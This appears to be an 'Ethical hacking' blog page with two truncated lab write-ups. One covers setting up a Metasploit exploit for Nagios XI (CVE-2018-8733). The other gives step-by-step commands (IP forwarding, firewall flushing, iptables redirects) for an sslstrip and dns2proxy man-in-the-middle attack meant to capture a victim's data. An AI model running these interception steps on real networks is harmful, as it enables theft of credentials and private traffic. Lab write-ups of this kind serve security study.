Ethical hacking

     Nagios XI 5.2.6-5.4.12 -Chained Remote Code Execution(Metasploit) Introduction:- As the new exploit(CVE-2018-8733) is published which is capable to exploit the Nagios XI between version 5.2.6 to 5.4.12.Nagios is available in all the platform so i download the nagios virtual machine version 5.4.10 for my lab and download the exploit from www.exploit-db.com and paste it in the sub directory “exploit” of the metasploit framework and initialise the database or you can easily update the metasploit-framework by updating the OS. About Nagios XI:- Nagios is the most powerful,trusted,free and open source computer software application which helps in network monitoring,server monitoring and application monitoring and entire infrastructure and ensuring systems,applications,services and business process are functioning properly.It is easy to configure package along with advanced alerting and reporting. Lab environment:- Software:-VMware Workstation Pro ...

POC OF sslstrip with dns2proxy Introduction:- This is a POC of sslstrip. Here We intercept the traffic and get all the juicy data enter by the victim by using the sslstrip-master,dns2proxy-master Lab Environment:- Attacker’s operating system:-linux kali 4.13.0-kali-amd64 Victim’s operating system:-window 7 Required tools:-sslstrip-master,dns2proxy-master Steps of attack:- Step 1: #cd sslstrip-master/(change directory to sslstrip-master) #python setup.py install(install sslstrip-master) Step 2: #echo “1” > /proc/sys/net/ipv4/ip_forward(Enables IP forwarding) #iptables --flush( Removing all firewall rules ) #iptables --flush -t nat() #iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 9000(forward all the traffic to port number 9000) #iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53 Step 3: #ifconfig(for finding the ip address of the attacker’s machine 192.168.29...